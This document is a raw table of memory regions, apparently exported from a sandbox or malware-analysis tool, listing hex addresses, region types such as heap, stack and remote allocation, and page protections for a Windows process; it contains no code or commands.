7572000
unkown
page readonly
A164000
heap
page read and write
4910000
heap
page read and write
603F000
heap
page read and write
28251780000
trusted library allocation
page read and write
E6E3000
unkown
page read and write
7FF511492000
unkown
page readonly
1230000
unkown
page readonly
463E675000
stack
page read and write
26AC6AF6000
heap
page read and write
E0C000
heap
page read and write
4FC0000
unkown
page readonly
2F15000
heap
page read and write
1A54B88C000
trusted library allocation
page read and write
2F2E000
heap
page read and write
7FF9F1830000
trusted library allocation
page read and write
A0A5000
heap
page read and write
7FF5112C1000
unkown
page readonly
6048000
heap
page read and write
2F84000
heap
page read and write
7AED000
stack
page read and write
83A0000
heap
page read and write
72D0000
heap
page read and write
3121000
heap
page read and write
4960000
heap
page read and write
2060BF60000
unkown
page readonly
F50000
unkown
page readonly
4900000
heap
page read and write
84E4000
heap
page read and write
7FF51154B000
unkown
page readonly
7FF5116E0000
unkown
page readonly
D165000
unkown
page readonly
1A54950C000
heap
page read and write
DD3B000
stack
page read and write
937C000
stack
page read and write
F9A000
heap
page read and write
7490000
trusted library allocation
page read and write
7FFA5B56D000
unkown
page write copy
2800000
unkown
page read and write
5F59000
heap
page read and write
8574000
heap
page read and write
7FF511703000
unkown
page readonly
C78C000
stack
page read and write
1220000
heap
page read and write
D596000
heap
page read and write
7F91000
unkown
page read and write
3008000
stack
page read and write
2824916E000
trusted library allocation
page read and write
7FF5118E8000
unkown
page readonly
26AC1B02000
heap
page read and write
88BB000
stack
page read and write
5487000
stack
page read and write
A199000
heap
page read and write
7D1E000
unkown
page readonly
7FF51130E000
unkown
page readonly
84B0000
heap
page read and write
A1DA000
heap
page read and write
2CCDDCF000
stack
page read and write
85D3000
heap
page read and write
813C000
unkown
page read and write
78ED000
stack
page read and write
8B39C7E000
stack
page read and write
494E000
heap
page read and write
A094000
heap
page read and write
206260C0000
trusted library allocation
page read and write
1A54ADA0000
heap
page read and write
2CCDC85000
stack
page read and write
E50A000
stack
page read and write
2060E322000
trusted library allocation
page read and write
E10E000
stack
page read and write
8123000
unkown
page read and write
DF74000
heap
page read and write
CFE2000
unkown
page readonly
7FFA5BB61000
unkown
page execute read
281A2020000
heap
page read and write
A0D7000
heap
page read and write
12FC7B50000
trusted library allocation
page read and write
8250000
unkown
page readonly
1C7C7460000
trusted library allocation
page read and write
57D5000
heap
page read and write
7FF511A28000
unkown
page readonly
7FF51130A000
unkown
page readonly
437227F000
stack
page read and write
86A1000
heap
page read and write
7FF51178B000
unkown
page readonly
7470000
trusted library allocation
page read and write
8B39E7F000
stack
page read and write
7A2E000
unkown
page readonly
83E5000
heap
page read and write
1A54953F000
heap
page read and write
7B4A000
unkown
page readonly
281A1FDA000
heap
page read and write
CF35000
unkown
page readonly
85DB000
heap
page read and write
7FF511595000
unkown
page readonly
12FE081C000
trusted library allocation
page read and write
5800000
heap
page read and write
12FE01A1000
trusted library allocation
page read and write
2F03000
heap
page read and write
12FD809A000
trusted library allocation
page read and write
B40000
trusted library allocation
page read and write
12FC7B50000
trusted library allocation
page read and write
23394F60000
heap
page read and write
60F8000
heap
page read and write
8150000
unkown
page read and write
1E4A8C7F000
heap
page read and write
E839000
unkown
page read and write
EC4A000
heap
page read and write
606E000
heap
page read and write
D247000
unkown
page readonly
1C7AF159000
trusted library allocation
page read and write
81B0000
unkown
page read and write
7FF9F1930000
trusted library allocation
page read and write
7CCC000
unkown
page readonly
1C7C7450000
trusted library allocation
page read and write
A19B000
heap
page read and write
D3BA000
stack
page read and write
8348000
heap
page read and write
7FF5114AC000
unkown
page readonly
3121000
heap
page read and write
26AC1A15000
heap
page read and write
7FF9F18B0000
trusted library allocation
page read and write
7FF511A3B000
unkown
page readonly
D247000
unkown
page readonly
5FC2000
heap
page read and write
2EEC000
unkown
page read and write
927D000
stack
page read and write
2EEF000
unkown
page read and write
7FF5117CA000
unkown
page readonly
4E85000
stack
page read and write
4AA0000
unkown
page write copy
9F59000
heap
page read and write
7FF9F15C0000
trusted library allocation
page read and write
D165000
unkown
page readonly
5C2E000
unkown
page read and write
1A56346D000
heap
page read and write
2F42000
unkown
page read and write
E48A000
stack
page read and write
310B000
heap
page read and write
4730000
unkown
page read and write
842A000
heap
page read and write
1C7C7273000
heap
page read and write
74A0000
trusted library allocation
page read and write
59B6000
heap
page read and write
1136000
heap
page read and write
4990000
unkown
page readonly
8188000
unkown
page read and write
7FF9F1780000
trusted library allocation
page read and write
7FF9F15B3000
trusted library allocation
page read and write
5160000
unkown
page read and write
FAE000
stack
page read and write
2811000
heap
page read and write
4A9D000
heap
page read and write
28239648000
trusted library allocation
page read and write
2ED1000
unkown
page read and write
7FF5114C6000
unkown
page readonly
7FF511954000
unkown
page readonly
1C7AD310000
heap
page read and write
7FF511537000
unkown
page readonly
4D50000
unkown
page readonly
1020000
heap
page read and write
2EDD000
heap
page read and write
471A000
unkown
page read and write
4F8BCFB000
stack
page read and write
7FF51188A000
unkown
page readonly
AF4B000
stack
page read and write
112B000
heap
page read and write
2A0A000
unclassified section
page execute and read and write
5F59000
heap
page read and write
A1D3000
heap
page read and write
A50C000
stack
page read and write
9F6D000
heap
page read and write
2EDC000
heap
page read and write
E546000
unkown
page read and write
E495000
unkown
page read and write
7FF511529000
unkown
page readonly
15629500000
heap
page read and write
6084000
heap
page read and write
9E9D000
heap
page read and write
DEE0000
heap
page read and write
B7C9000
stack
page read and write
2060C0A2000
heap
page read and write
D584000
heap
page read and write
7FF511951000
unkown
page readonly
8534000
heap
page read and write
7FFA5BD00000
unkown
page read and write
A1EA000
heap
page read and write
49EF000
trusted library allocation
page execute and read and write
2AC8000
trusted library allocation
page read and write
8464000
heap
page read and write
281A1FB0000
heap
page read and write
28236F57000
heap
page read and write
12FC6055000
heap
page read and write
D4C0000
trusted library allocation
page read and write
2825122E000
heap
page read and write
20626050000
heap
page read and write
6089000
heap
page read and write
1A54B756000
trusted library allocation
page read and write
80FA000
unkown
page read and write
A0B8000
heap
page read and write
B40000
trusted library allocation
page read and write
2F4C000
heap
page read and write
1E4A8C7F000
heap
page read and write
60B2000
heap
page read and write
60CC000
stack
page read and write
334B000
trusted library allocation
page execute and read and write
539D000
unkown
page read and write
1C7AD186000
heap
page read and write
7FF9F1820000
trusted library allocation
page read and write
8963000
unkown
page read and write
3A42000
heap
page read and write
5BD2000
unkown
page read and write
7FF511248000
unkown
page readonly
60BB000
heap
page read and write
338A000
stack
page read and write
EE53000
unkown
page read and write
A1C3000
heap
page read and write
85F0000
heap
page read and write
6BFE000
stack
page read and write
12FE01B0000
trusted library allocation
page read and write
28251090000
trusted library allocation
page read and write
3145000
heap
page read and write
A02A000
heap
page read and write
58A7000
heap
page read and write
7FF5117F7000
unkown
page readonly
1039B000
heap
page read and write
1203000
heap
page read and write
12FC61E0000
trusted library allocation
page read and write
7FF9F17B2000
trusted library allocation
page read and write
1387000
heap
page read and write
7FFA594ED000
unkown
page write copy
608F000
heap
page read and write
DB0000
heap
page read and write
440000
heap
page read and write
69CB000
unkown
page read and write
85E4000
heap
page read and write
7EB7000
unkown
page read and write
1030000
unkown
page readonly
10D0E000
stack
page read and write
A098000
heap
page read and write
1A563453000
heap
page read and write
A1B9000
heap
page read and write
28251880000
trusted library allocation
page read and write
7FFF000
unkown
page read and write
49A8000
heap
page read and write
3285000
stack
page read and write
7A47000
unkown
page readonly
7FF511A43000
unkown
page readonly
7FF9F16F0000
trusted library allocation
page execute and read and write
E6E3000
unkown
page read and write
A059000
heap
page read and write
82F0000
heap
page read and write
7DF425C71000
unkown
page execute read
60FC000
stack
page read and write
7FF9F1860000
trusted library allocation
page read and write
1A10B0B4000
heap
page read and write
1E4A917F000
heap
page read and write
28251270000
heap
page read and write
1140F000
stack
page read and write
756B000
unkown
page readonly
7FF9000
unkown
page read and write
7EBC000
unkown
page read and write
6048000
heap
page read and write
28251770000
trusted library allocation
page read and write
F52027F000
stack
page read and write
C938000
stack
page read and write
DF8A000
heap
page read and write
E98E000
stack
page read and write
A02D000
heap
page read and write
5D20000
heap
page read and write
7FF9F1690000
trusted library allocation
page execute and read and write
DF90000
heap
page read and write
9B7D000
stack
page read and write
26AC1089000
heap
page read and write
26AC10B0000
heap
page read and write
7FF511676000
unkown
page readonly
20626210000
trusted library allocation
page read and write
DF90000
heap
page read and write
D0DE000
unkown
page readonly
7DF4197A1000
trusted library allocation
page execute read
1E4A9560000
heap
page read and write
E848000
unkown
page read and write
2C89000
stack
page read and write
858F000
heap
page read and write
44F000
heap
page read and write
5827000
heap
page read and write
A1D3000
heap
page read and write
8441000
heap
page read and write
FA0000
unkown
page readonly
7FF511318000
unkown
page readonly
10B8C000
stack
page read and write
3E0000
system
page execute and read and write
7FFA5BC49000
unkown
page readonly
9FAF000
heap
page read and write
7CED000
stack
page read and write
26AC6A87000
heap
page read and write
7FF9F1860000
trusted library allocation
page read and write
5F29000
heap
page read and write
7C8E000
unkown
page readonly
5FC2000
heap
page read and write
D233000
unkown
page readonly
861B000
heap
page read and write
7FF511552000
unkown
page readonly
4B9A000
unclassified section
page read and write
85D6000
heap
page read and write
463EA79000
stack
page read and write
DF74000
heap
page read and write
9F71000
heap
page read and write
CF47000
unkown
page readonly
1C7C7310000
trusted library allocation
page read and write
282517B0000
trusted library allocation
page read and write
7FFA59351000
unkown
page execute read
CE85000
unkown
page readonly
7FF5114E5000
unkown
page readonly
B8CA000
stack
page read and write
723FEFE000
stack
page read and write
7FFA5B4B9000
unkown
page readonly
A5BE000
stack
page read and write
7E3F000
stack
page read and write
7FF5116E7000
unkown
page readonly
7FF9F1809000
trusted library allocation
page read and write
12FE0220000
heap
page read and write
A179000
heap
page read and write
7FFA594EE000
unkown
page read and write
206260C0000
trusted library allocation
page read and write
5852000
heap
page read and write
4A51000
heap
page read and write
58FE000
heap
page read and write
7FF9F1830000
trusted library allocation
page read and write
463E77F000
stack
page read and write
1C7C7420000
trusted library allocation
page read and write
8B3A3BB000
stack
page read and write
60F8000
heap
page read and write
28251080000
trusted library allocation
page read and write
8004000
unkown
page read and write
6100000
unkown
page read and write
1E4A93ED000
heap
page read and write
5800000
heap
page read and write
E199000
unkown
page read and write
8441000
heap
page read and write
7180000
heap
page read and write
DF90000
heap
page read and write
5B80000
unkown
page read and write
1130E000
stack
page read and write
6038000
heap
page read and write
49EB000
trusted library allocation
page execute and read and write
5975000
heap
page read and write
12FC80F0000
trusted library allocation
page read and write
282389D4000
trusted library allocation
page read and write
4780000
unkown
page read and write
7FFA5B563000
unkown
page read and write
57D9000
heap
page read and write
20169DD0000
heap
page read and write
7D33000
unkown
page readonly
DD3B000
stack
page read and write
108CF000
stack
page read and write
A20000
unkown
page read and write
AA33000
unkown
page read and write
5FCD000
heap
page read and write
5890000
heap
page read and write
6100000
unkown
page read and write
9F69000
heap
page read and write
3285000
stack
page read and write
59B6000
heap
page read and write
7FF5118EF000
unkown
page readonly
83A3000
heap
page read and write
12FE0243000
heap
page read and write
A187000
heap
page read and write
7FF9F15CD000
trusted library allocation
page execute and read and write
B9CA000
stack
page read and write
7D5C000
unkown
page readonly
E89C000
unkown
page read and write
A03C000
heap
page read and write
1A563850000
trusted library allocation
page read and write
A187000
heap
page read and write
7FF51154B000
unkown
page readonly
F699000
stack
page read and write
7FF511A0C000
unkown
page readonly
281A201D000
heap
page read and write
18D5432E000
heap
page read and write
87BD000
stack
page read and write
7FFA5BD5F000
unkown
page readonly
4A0B000
unkown
page read and write
1A563850000
trusted library allocation
page read and write
4F8B7FE000
stack
page read and write
5C85000
unkown
page read and write
751D000
stack
page read and write
E54A000
unkown
page read and write
7FF5118B4000
unkown
page readonly
9A75000
stack
page read and write
7A2E000
unkown
page readonly
1E4A71B0000
heap
page read and write
12FDFFF0000
trusted library allocation
page read and write
D83B000
stack
page read and write
A1A6000
heap
page read and write
5852000
heap
page read and write
1A549430000
heap
page read and write
9F73000
heap
page read and write
12FC8427000
trusted library allocation
page read and write
B4CE000
stack
page read and write
1138E000
stack
page read and write
987B000
stack
page read and write
7AD4000
unkown
page readonly
7FF9F1870000
trusted library allocation
page read and write
E194000
unkown
page read and write
26AC6AF0000
heap
page read and write
7FFA5BCFA000
unkown
page read and write
2825129C000
heap
page read and write
B849000
stack
page read and write
6FF9000
stack
page read and write
8408000
heap
page read and write
60E7000
heap
page read and write
1A56343F000
heap
page read and write
7FF5119C6000
unkown
page readonly
A034000
heap
page read and write
597B000
heap
page read and write
8622000
heap
page read and write
1C7C70FF000
heap
page read and write
103CC000
heap
page read and write
FB8F000
stack
page read and write
5100000
unkown
page readonly
2820000
unkown
page readonly
DBBF000
stack
page read and write
867D000
heap
page read and write
2F46000
heap
page read and write
E75000
stack
page read and write
12FC601B000
heap
page read and write
12FC8EDD000
trusted library allocation
page read and write
4A7A000
stack
page read and write
FF91000
heap
page read and write
103C6000
heap
page read and write
F51FD7B000
stack
page read and write
1E4A7170000
heap
page read and write
8698000
heap
page read and write
281A1401000
trusted library allocation
page read and write
2F6C000
stack
page read and write
58BB000
heap
page read and write
7DF4197A1000
trusted library allocation
page execute read
1C7AD230000
heap
page read and write
7CED000
stack
page read and write
813C000
unkown
page read and write
494E000
heap
page read and write
8720000
unkown
page readonly
A0A9000
heap
page read and write
1A10D500000
heap
page read and write
206260C0000
trusted library allocation
page read and write
D556000
heap
page read and write
5440000
unkown
page readonly
7FF511981000
unkown
page readonly
12FC61E4000
trusted library allocation
page read and write
85BD000
heap
page read and write
12FD7EF0000
trusted library allocation
page read and write
5532000
trusted library allocation
page read and write
86AB000
heap
page read and write
18D542B0000
heap
page read and write
7BFE000
unkown
page readonly
2060BF80000
unkown
page read and write
A080000
heap
page read and write
597B000
heap
page read and write
12FE01B0000
trusted library allocation
page read and write
10390000
heap
page read and write
1C7AEFC0000
heap
page execute and read and write
5120000
unkown
page read and write
DA80000
heap
page read and write
1A10D2FD000
heap
page read and write
7FF51149F000
unkown
page readonly
DF8B000
stack
page read and write
4B6C000
stack
page read and write
281A16F0000
heap
page read and write
EA0D000
stack
page read and write
2F9F000
unkown
page read and write
12FE026E000
heap
page read and write
860C000
stack
page read and write
28251820000
trusted library allocation
page read and write
8612000
heap
page read and write
12FE0191000
trusted library allocation
page read and write
1C7AD152000
heap
page read and write
28248FDE000
trusted library allocation
page read and write
83A4000
heap
page read and write
85F6000
heap
page read and write
103A9000
heap
page read and write
910000
unkown
page read and write
1C7AFFB3000
trusted library allocation
page read and write
4A9D000
heap
page read and write
28248FC2000
trusted library allocation
page read and write
23395078000
heap
page read and write
8517000
heap
page read and write
7FF9F1940000
trusted library allocation
page read and write
FF0000
remote allocation
page read and write
7FF511303000
unkown
page readonly
83A3000
heap
page read and write
7FF9F1761000
trusted library allocation
page read and write
2E1F000
unkown
page read and write
7460000
heap
page read and write
74B0000
trusted library allocation
page read and write
910000
unkown
page read and write
7FF511643000
unkown
page readonly
CA83000
unkown
page readonly
7FF9F1776000
trusted library allocation
page read and write
12FE0180000
trusted library allocation
page read and write
1C7AD0D0000
heap
page read and write
281A1400000
trusted library allocation
page read and write
5D20000
unkown
page read and write
10A4B000
stack
page read and write
CA6B000
unkown
page readonly
7FF511743000
unkown
page readonly
7FF5112F3000
unkown
page readonly
7FF5118CF000
unkown
page readonly
282389E0000
trusted library allocation
page read and write
4D00000
unkown
page read and write
60AB000
heap
page read and write
1A549538000
heap
page read and write
8584000
heap
page read and write
9FB7000
heap
page read and write
A0A6000
heap
page read and write
7FFA5B3D1000
unkown
page execute read
281A1401000
trusted library allocation
page read and write
6006000
heap
page read and write
6670000
trusted library allocation
page read and write
CA6E000
unkown
page readonly
7FF9F1810000
trusted library allocation
page read and write
1A54B35C000
trusted library allocation
page read and write
4720000
unkown
page read and write
51C6000
unkown
page read and write
2DAF000
stack
page read and write
84AC000
heap
page read and write
281A1290000
heap
page execute and read and write
C938000
stack
page read and write
2D26000
stack
page read and write
28251070000
trusted library allocation
page read and write
2F85000
unkown
page read and write
6089000
heap
page read and write
2818955B000
trusted library allocation
page read and write
A02A000
heap
page read and write
10B0F000
stack
page read and write
A1CA000
heap
page read and write
49E5000
heap
page read and write
85A9000
heap
page read and write
E486000
unkown
page read and write
7C6D000
stack
page read and write
100CD000
stack
page read and write
1A563370000
heap
page read and write
7DF45EE51000
trusted library allocation
page execute read
8591000
heap
page read and write
A63B000
stack
page read and write
12FDFFE0000
trusted library allocation
page read and write
7FF511674000
unkown
page readonly
4F9E000
stack
page read and write
1158E000
stack
page read and write
3E0000
system
page execute and read and write
2CCE27E000
stack
page read and write
CEF1000
unkown
page readonly
1A10D0C4000
heap
page read and write
1A563530000
heap
page execute and read and write
3008000
stack
page read and write
3460000
unkown
page readonly
84A9000
heap
page read and write
1C7AEB70000
heap
page readonly
856E000
heap
page read and write
A03C000
heap
page read and write
7FF9F1850000
trusted library allocation
page read and write
7FFA5950A000
unkown
page readonly
C9D3000
unkown
page readonly
20626023000
heap
page read and write
A068000
heap
page read and write
DF5A000
heap
page read and write
12FE07C0000
trusted library allocation
page read and write
3E9000
system
page execute and read and write
E51B000
stack
page read and write
28251870000
trusted library allocation
page read and write
EE14000
unkown
page read and write
281872F2000
heap
page read and write
CE41000
unkown
page readonly
7FF9F1880000
trusted library allocation
page read and write
7572000
unkown
page readonly
9F7D000
heap
page read and write
9F2E000
heap
page read and write
854B000
heap
page read and write
57E6000
heap
page read and write
31D2000
heap
page read and write
844B000
heap
page read and write
337A000
stack
page read and write
281A2021000
heap
page read and write
7A4F000
unkown
page readonly
9FE8000
heap
page read and write
11B0E000
stack
page read and write
86AB000
heap
page read and write
539D000
unkown
page read and write
3008000
stack
page read and write
2AAE000
stack
page read and write
206260C1000
trusted library allocation
page read and write
4CB0000
unkown
page read and write
7FFB000
unkown
page read and write
6C7D000
stack
page read and write
6720000
trusted library allocation
page read and write
E49E000
stack
page read and write
9EC4000
heap
page read and write
2F37000
heap
page read and write
5C20000
unkown
page read and write
85DB000
heap
page read and write
26AC2110000
trusted library allocation
page read and write
9E00000
heap
page read and write
8575000
heap
page read and write
E833000
unkown
page read and write
103C4000
heap
page read and write
7FF9F17D0000
trusted library allocation
page read and write
4C6B000
stack
page read and write
9EDE000
heap
page read and write
E8A000
heap
page read and write
86AB000
heap
page read and write
2D26000
stack
page read and write
E41A000
stack
page read and write
83D3000
heap
page read and write
7FF5112F3000
unkown
page readonly
282510A0000
trusted library allocation
page read and write
2823943C000
trusted library allocation
page read and write
2EB9000
heap
page read and write
EE9B000
unkown
page read and write
2F84000
heap
page read and write
7FFA594E3000
unkown
page read and write
D08C000
unkown
page readonly
281A202E000
heap
page read and write
CDAD000
unkown
page readonly
2CCE07E000
stack
page read and write
D50000
heap
page read and write
8601000
heap
page read and write
8188000
unkown
page read and write
584E000
heap
page read and write
A48A000
stack
page read and write
5190000
unkown
page read and write
391F000
stack
page read and write
FA0000
unkown
page readonly
C9BA000
stack
page read and write
5BD1000
unkown
page read and write
86A1000
heap
page read and write
E39E000
stack
page read and write
D73B000
stack
page read and write
603C000
heap
page read and write
860C000
stack
page read and write
1A10D151000
heap
page read and write
7BAC000
unkown
page readonly
103A5000
heap
page read and write
1C7AEBC5000
heap
page read and write
2F7A000
heap
page read and write
2843000
heap
page read and write
E5B000
heap
page read and write
26AC6A1D000
heap
page read and write
1C7AD140000
heap
page read and write
3183000
stack
page read and write
9EFB000
heap
page read and write
1C7C72F0000
heap
page read and write
B060000
unkown
page readonly
5C9C000
unkown
page read and write
1C7C7233000
heap
page read and write
7DF45EE40000
trusted library allocation
page readonly
E28B000
stack
page read and write
E112000
unkown
page read and write
7FF9F15DD000
trusted library allocation
page execute and read and write
7FF9F15E3000
trusted library allocation
page read and write
58B3000
heap
page read and write
7FF9F1762000
trusted library allocation
page read and write
FDC59F9000
stack
page read and write
D165000
unkown
page readonly
18D542C9000
heap
page read and write
12FE0190000
trusted library allocation
page read and write
1230000
unkown
page readonly
328B000
stack
page read and write
5280000
unkown
page readonly
11A0F000
stack
page read and write
510C000
stack
page read and write
1A5494FA000
heap
page read and write
7FF511501000
unkown
page readonly
4947000
heap
page read and write
7D72000
unkown
page readonly
1C7C7450000
trusted library allocation
page read and write
3116000
heap
page read and write
C990000
unkown
page readonly
A1DF000
heap
page read and write
590B000
heap
page read and write
7360000
trusted library allocation
page read and write
282389E0000
trusted library allocation
page read and write
E40000
unclassified section
page execute and read and write
2F82000
heap
page read and write
7FF9F1800000
trusted library allocation
page read and write
816A000
unkown
page read and write
1A10D33F000
heap
page read and write
6EF5000
stack
page read and write
850D000
heap
page read and write
A1DA000
heap
page read and write
850A000
stack
page read and write
9F38000
heap
page read and write
7FE3000
unkown
page read and write
4906000
heap
page read and write
103C8000
heap
page read and write
15500BE000
stack
page read and write
D247000
unkown
page readonly
1A54AD90000
trusted library allocation
page read and write
835C000
heap
page read and write
154FEBC000
stack
page read and write
DC8A000
stack
page read and write
1C7AD184000
heap
page read and write
7FF51186D000
unkown
page readonly
7FF9F18C0000
trusted library allocation
page read and write
D552000
heap
page read and write
447000
heap
page read and write
2EAD000
heap
page read and write
D269000
unkown
page readonly
607D000
heap
page read and write
E560000
unkown
page read and write
28251241000
heap
page read and write
816F000
unkown
page read and write
590B000
heap
page read and write
2E1F000
unkown
page read and write
EED4000
unkown
page read and write
85E4000
heap
page read and write
5188000
stack
page read and write
8698000
heap
page read and write
7FF9F17E0000
trusted library allocation
page read and write
7FF9F15DD000
trusted library allocation
page execute and read and write
E8A0000
unkown
page read and write
99FC000
stack
page read and write
A199000
heap
page read and write
7FF511595000
unkown
page readonly
2EDA000
heap
page read and write
DD3B000
stack
page read and write
1A54B2B0000
trusted library allocation
page read and write
93F9000
stack
page read and write
7FF5119B4000
unkown
page readonly
1225000
heap
page read and write
7FF511734000
unkown
page readonly
437207B000
stack
page read and write
26AC6610000
trusted library allocation
page read and write
7FF511486000
unkown
page readonly
5400000
unkown
page read and write
282518A0000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
7DF4B9A60000
trusted library allocation
page execute and read and write
83AC000
heap
page read and write
1A10CFC0000
heap
page read and write
DF90000
heap
page read and write
A022000
heap
page read and write
7FF511703000
unkown
page readonly
12FDFF82000
heap
page read and write
2EDC000
heap
page read and write
A19B000
heap
page read and write
12FDFF6B000
heap
page read and write
8575000
heap
page read and write
F50000
unkown
page readonly
7FF9F1680000
trusted library allocation
page read and write
852A000
heap
page read and write
D233000
unkown
page readonly
281895CE000
trusted library allocation
page read and write
2ED9000
heap
page read and write
33CE000
stack
page read and write
EF50000
unkown
page execute and read and write
7FF5114E5000
unkown
page readonly
8590000
heap
page read and write
D063000
unkown
page readonly
69C1000
unkown
page read and write
751D000
stack
page read and write
7FF511601000
unkown
page readonly
4880000
trusted library allocation
page read and write
F34000
heap
page read and write
7F66000
stack
page read and write
281874C0000
trusted library allocation
page read and write
12FC6180000
trusted library allocation
page read and write
4710000
trusted library allocation
page read and write
FF52000
heap
page read and write
9F38000
heap
page read and write
844B000
heap
page read and write
E6D9000
unkown
page read and write
103CF000
heap
page read and write
4710000
trusted library allocation
page read and write
7727000
system
page read and write
7FFA5B570000
unkown
page read and write
7FF511303000
unkown
page readonly
72400FF000
stack
page read and write
1C7AFC3E000
trusted library allocation
page read and write
E50C000
stack
page read and write
3121000
heap
page read and write
834F000
heap
page read and write
752A000
system
page read and write
26AC0F30000
heap
page read and write
494E000
heap
page read and write
1C7AF0F1000
trusted library allocation
page read and write
E5C000
heap
page read and write
A187000
heap
page read and write
83BA000
heap
page read and write
7FF511531000
unkown
page readonly
20626023000
heap
page read and write
FF1A000
stack
page read and write
1C7C7460000
trusted library allocation
page read and write
FF89000
heap
page read and write
1A563840000
trusted library allocation
page read and write
26AC1102000
heap
page read and write
5898000
heap
page read and write
4730000
trusted library section
page read and write
7FF9F1656000
trusted library allocation
page read and write
20626210000
trusted library allocation
page read and write
282517E0000
trusted library allocation
page read and write
206260C0000
trusted library allocation
page read and write
1562944F000
heap
page read and write
7FF511499000
unkown
page readonly
A1A6000
heap
page read and write
7FF5119C1000
unkown
page readonly
A62B9FC000
stack
page read and write
F34000
heap
page read and write
AA33000
unkown
page read and write
5310000
unkown
page read and write
1203000
heap
page read and write
7FF5113D1000
unkown
page readonly
9F2E000
heap
page read and write
7FFA5BCF5000
unkown
page read and write
8522000
heap
page read and write
7320000
trusted library allocation
page read and write
7FF9F1840000
trusted library allocation
page read and write
1C7C75E1000
heap
page read and write
463ECBE000
stack
page read and write
A17D000
heap
page read and write
26AC6850000
trusted library allocation
page read and write
7DF45EE40000
trusted library allocation
page readonly
7FF51154E000
unkown
page readonly
7FF5115C6000
unkown
page readonly
12FE0180000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
7DF45EE41000
trusted library allocation
page execute read
E29C000
stack
page read and write
7FF5114FE000
unkown
page readonly
5BCF000
unkown
page read and write
7FFA5B5CF000
unkown
page readonly
15629486000
heap
page read and write
4710000
unkown
page read and write
281872B4000
heap
page read and write
26AC6A8A000
heap
page read and write
F618000
stack
page read and write
60FC000
stack
page read and write
3290000
unkown
page readonly
9E87000
heap
page read and write
2060C1B5000
heap
page read and write
12FE0920000
trusted library allocation
page read and write
2060BF80000
unkown
page read and write
2F9F000
unkown
page read and write
A15E000
heap
page read and write
CF4F000
unkown
page readonly
751D000
stack
page read and write
8250000
unkown
page readonly
2BF0000
unkown
page readonly
90FD000
stack
page read and write
7FFA5BCFC000
unkown
page read and write
7970000
unkown
page readonly
AC5000
stack
page read and write
7FF9F18F0000
trusted library allocation
page read and write
A43C000
stack
page read and write
7FF51160D000
unkown
page readonly
7583000
unkown
page readonly
5978000
heap
page read and write
28251071000
trusted library allocation
page read and write
12FDFEE0000
heap
page read and write
855D000
heap
page read and write
DEE0000
heap
page read and write
A199000
heap
page read and write
1C7BF155000
trusted library allocation
page read and write
7FF51174E000
unkown
page readonly
84EC000
heap
page read and write
83A3000
heap
page read and write
DEE0000
heap
page read and write
D025000
unkown
page readonly
A168000
heap
page read and write
A6BB000
stack
page read and write
FF54000
heap
page read and write
B1CC000
stack
page read and write
281896D3000
trusted library allocation
page read and write
8622000
heap
page read and write
9E9D000
heap
page read and write
CA6B000
unkown
page readonly
2FA3000
unkown
page read and write
59BA000
heap
page read and write
28189736000
trusted library allocation
page read and write
4AA0000
unkown
page write copy
7FF5112A0000
unkown
page readonly
7FF511A36000
unkown
page readonly
E33C000
unkown
page read and write
1A563510000
trusted library allocation
page read and write
A0C4000
heap
page read and write
A0A6000
heap
page read and write
7FF51149F000
unkown
page readonly
7FF9F17E0000
trusted library allocation
page read and write
9EB5000
heap
page read and write
5AD0000
trusted library allocation
page read and write
D16E000
unkown
page readonly
28238F41000
trusted library allocation
page read and write
1C7AFF24000
trusted library allocation
page read and write
587E000
heap
page read and write
12FC5FE8000
heap
page read and write
7FF9F1810000
trusted library allocation
page read and write
7FF511730000
unkown
page readonly
7FF9F15B0000
trusted library allocation
page read and write
A166000
heap
page read and write
DF0E000
stack
page read and write
83FE000
heap
page read and write
8620000
heap
page read and write
26AC6B02000
heap
page read and write
26AC1B00000
heap
page read and write
9FC2000
heap
page read and write
7FF511547000
unkown
page readonly
7EF6000
unkown
page read and write
D565000
heap
page read and write
7977000
unkown
page readonly
7FF5114C6000
unkown
page readonly
7FF5114C9000
unkown
page readonly
59B6000
heap
page read and write
7DF425C71000
unkown
page execute read
A27E000
stack
page read and write
5893000
heap
page read and write
54F4000
stack
page read and write
282388E0000
trusted library allocation
page read and write
12FE01B0000
trusted library allocation
page read and write
756E000
unkown
page readonly
8B3A23E000
stack
page read and write
4910000
heap
page read and write
AC5000
stack
page read and write
C938000
stack
page read and write
2CCE377000
stack
page read and write
FA0000
unkown
page readonly
85E4000
heap
page read and write
F20000
heap
page read and write
540E000
stack
page read and write
7DF419780000
trusted library allocation
page readonly
3050000
unkown
page read and write
EA0000
unclassified section
page execute and read and write
26AC10FA000
heap
page read and write
60ED000
heap
page read and write
2CCE3FE000
stack
page read and write
85A4000
heap
page read and write
7FF51131C000
unkown
page readonly
281A2015000
heap
page read and write
7FF9F15B3000
trusted library allocation
page execute and read and write
118DE000
stack
page read and write
2818970F000
trusted library allocation
page read and write
D25C000
unkown
page readonly
28251790000
trusted library allocation
page read and write
2FDF000
stack
page read and write
7FF5119CA000
unkown
page readonly
E48A000
stack
page read and write
E89B000
unkown
page read and write
4DDAD6E000
stack
page read and write
D21E000
unkown
page readonly
CF7000
trusted library allocation
page read and write
28250F73000
heap
page read and write
5350000
unkown
page readonly
606E000
heap
page read and write
18D54335000
heap
page read and write
8590000
heap
page read and write
DCBC000
stack
page read and write
78ED000
stack
page read and write
2060D9C0000
trusted library allocation
page read and write
26D1EFE000
stack
page read and write
12FE0940000
trusted library allocation
page read and write
A149000
heap
page read and write
27E304F0000
trusted library allocation
page read and write
7FF511622000
unkown
page readonly
5196000
unkown
page read and write
7FF9F1900000
trusted library allocation
page read and write
4760000
unkown
page read and write
82F0000
heap
page read and write
7FF511295000
unkown
page readonly
7FF9F18B0000
trusted library allocation
page read and write
7FF5112FE000
unkown
page readonly
7FF9F15BD000
trusted library allocation
page execute and read and write
7FF51194E000
unkown
page readonly
1A5494B0000
heap
page read and write
23395083000
heap
page read and write
8322000
heap
page read and write
A3F8AFE000
stack
page read and write
E55A000
unkown
page read and write
7FF511AA6000
unkown
page readonly
DE0B000
stack
page read and write
9A75000
stack
page read and write
7FF5118BE000
unkown
page readonly
7FF511A3B000
unkown
page readonly
86AB000
heap
page read and write
8403000
heap
page read and write
4AF8000
heap
page read and write
A1DF000
heap
page read and write
1A54B894000
trusted library allocation
page read and write
5F59000
heap
page read and write
281A202E000
heap
page read and write
1203000
heap
page read and write
31B8000
heap
page read and write
1E4A91BC000
heap
page read and write
206260D0000
heap
page execute and read and write
7FF9F165C000
trusted library allocation
